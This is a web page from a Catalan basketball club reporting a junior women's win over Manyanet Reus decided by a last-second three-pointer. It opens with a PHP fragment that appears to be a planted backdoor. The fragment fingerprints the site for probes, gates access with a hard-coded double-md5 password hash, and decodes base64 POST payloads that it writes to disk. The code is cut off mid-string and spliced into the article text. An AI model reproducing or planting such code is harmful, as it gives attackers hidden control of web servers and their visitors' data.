function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un triple de Mallol en l'últim instant dona el triomf al júnior femení B contra el Manyanet Reus (53-52) - Tgn Bàsquet Club -

Un triple de Mallol en l’últim instant dona el triomf al júnior femení B contra el Manyanet Reus (53-52)

Updated: març 12, 2020

L’equip júnior femení B va derrotar el Manyanet Reus en un partit que es va disputar dimecres 11 de març, tot just abans de la suspensió d’entrenaments i partits arran de la crisi del coronavirus. El partit, que va estar igualat durant tot moment, es va resoldre gràcies un triple de Marina Mallol quan faltaven dos segons pel final del matx. Fins aleshores, el TGN Bàsquet va començar sense ritme i van anar a remolc de les visitants que en el minut 19 guanyaven per 19-27. Amb tot, una gran reacció lila va permetre igualar el matx al descans (19-19) i la igualtat va ser la tònica general fins que a l’inici del quart període, la inspiració i la concentració locals va permetre un avantatge de 9 punts a quatre minuts del final (50-41). Però moments de desconcert i imprecisions del TGN Bàsquet van permetre el Manyanet igualar i posteriorment superar les locals a 9 segons del final (50-52), moment en què va aparèixer el canell salvador de Mallol.